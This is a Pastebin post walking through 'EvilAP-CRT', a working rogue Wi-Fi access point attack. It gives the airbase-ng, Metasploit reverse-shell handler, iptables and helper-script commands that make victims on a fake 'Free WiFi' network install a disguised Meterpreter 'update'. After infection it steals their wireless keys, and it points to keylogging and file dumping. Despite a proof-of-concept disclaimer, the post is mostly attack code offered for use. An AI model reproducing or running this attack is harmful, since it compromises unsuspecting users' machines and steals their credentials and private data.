Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- EvilAP-CRT v1.0
- CRT stands for capture,release and transparency
- Please note this is proof of concept and for educational purposes only, this is not be used out in the wild.
- Victims cannot surf through out EvilAP unless they download and execute our fake update,
- authorisation to use the fakeap then works through mac authentication thus preventing those that do not download
- our fake update from surfing.
- ./evilapcrt.sh to run, make sure you give exec permission to this file
- mc2.sh and mc3.sh need exec permissions too you also need lighttpd for this to work
- So what does the script do?
- export fakeap_interface=wlan0 #this our fakeap, we use wlan0 which then turns to mon0 later in the script
- export router=192.168.1.1 #this is the route to the internet, this is usually your router, it is needed as a gateway
- export gateway_interface=eth0 #this is our access to the internet, it can be wireless too, but first make sure you connect to the internet
- First we copy dhcpd.conf to it's correct location, it looks like this
- ddns-update-style ad-hoc;
- default-lease-time 600;
- max-lease-time 7200;
- subnet 10.0.0.0 netmask 255.255.255.0 {
- option routers 10.0.0.1;
- option subnet-mask 255.255.255.0;
- option broadcast-address 10.0.0.0;
- option domain-name "example.com";
- option domain-name-servers 10.0.0.1;
- range dynamic-bootp 10.0.0.16 10.0.0.55;
- #range 10.0.0.20 10.0.0.50;
- }
- We then start our fakeap on wlan0
- modprobe tun
- airmon-ng start $fakeap_interface ####our fake ap assuming it's wlan0 start and is running as mon0
- FakeAP -e airbase-ng -e "Free WiFi" mon0 -v ###### started on mon0 essid Free WiFi, we can use extended features here such as -P for probe responding
- We start metasploit with
- Metasploit -e ./msfconsole -r /root/WK2/hb.rc #### lets have a look at hb.rc
- use exploit/multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp #we are using meterpreter reverse exe which i created earlier and renamed to update.exe and becomes our fake update
- set LHOST 10.0.0.1 ## i set it to 10.0.0.1 with port 28
- set LPORT 28
- set AutoRunScript /root/WK2/hb2.rb ##this is our autorun script
- set ExitOnSession false # we dont want to exit, we want more victims to be pwned
- show options
- exploit -j
- Now lets look at hb2.rb this is a long script which is executed, i will cut it down to the relevant bits
- bin = "wkv.exe" ###wireless key viewer modified to bypass AV's
- bin2 = "getmac1.exe" #### this is a windows utility, getmac.exe which dumps the users mac address
- bin3 = "getmac.bat" ### I created the bat file so it executes getmac1.exe writes the mac address to the system drive of the victim as macx.txt
- We then upload all these files and execute, we grab the wireless keys and we get the victims mac address
- wireless keys are downloaded to keys folder as random text files and mac address to allowmac folder again with random text file otherwise things get overwritten. I am skipping all the technical stuff out, the bulk of it is commented anyway for those that are interested
- Iptables are then setup
- echo "1">/proc/sys/net/ipv4/ip_forward # port forwarding is important otherwise victim cannot surf
- ifconfig lo up
- ifconfig at0 up
- ifconfig at0 10.0.0.1 netmask 255.255.255.0
- ifconfig at0 mtu 1800
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -t nat -F
- iptables -t mangle -F
- iptables -t nat -A POSTROUTING -s 10.0.0.0/24 -j MASQUERADE -o $gateway_interface
- iptables -t nat -A PREROUTING -p udp -j DNAT --to $router #### gate way to the internet
- iptables -t nat -A PREROUTING -m mark --mark 0x42 -j ACCEPT ### any marked macs we give them internet
- iptables -t filter -I FORWARD 1 -m mark --mark 0x42 -j ACCEPT ### as above, we allow marked macs to continue
- iptables -t nat -A PREROUTING -i at0 -p udp --dport 53 -j ACCEPT #### udp needed
- iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j REDIRECT --to-port 80 ###### any non marked mac's get redirected to our fake update page
- sleep 2
- /etc/init.d/dhcp3-server restart
- Please note this is a simple iptables, for protection block all ports except for 80, 53 and 28 which is our meterpreter port.... also block access to your router at 192.168.1.1 or atleast put better password on it otherwise you will end up with egg on your face hehehehe newbies use this at your own risk
- We then execute mc2 and mc3.sh, these are looped
- mc2.sh
- grep -h -E -o '[[:xdigit:]]{2}(-[[:xdigit:]]{2}){5}' /root/WK2/allowmac/* > /root/WK2/allowmac/mac
- ####here we are extracting the macs based on a pattern to mac.txt, this is because getmac extracts other data which we dont need
- mc3.sh
- KNOWN_MACS=`cat /root/WK2/allowmac/mac.txt | awk '{print $1}'`
- for MAC in $KNOWN_MACS ; do iptables -t mangle -I PREROUTING -m mac --mac-source $MAC -j MARK --set-mark 0x42
- #### once our victim has been exploited his mac address is available in mac.txt, we now need to mark this mac address so that they can surf the internet, we do this with the above command, and loop it
- Now our victim can connect, be redirected to our fake update page, download our fake update.exe and then once the hb2.rb script is run we allow them internet but stopping others from connecting
- we cannot stop giving access to the victim once exploited by deleting their mac address from mac.txt, you need to flush by iptables -t mangle -F, this puts all users back into the redirect script
- finally we run other tools such as dsnif, urlsniff etc etc...... here the possibilities are endless you can go back to metaspoit, interact with any of the sessions created and dump some interesting stuff. meterpreter gives you keylogging features too as well as the ability to dump doc, txt jpg's etc to a folder.
- remember to delete everything in allowmac folder, except for mac.txt and make sure mac.txt is empty when finished
- thats all folks
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement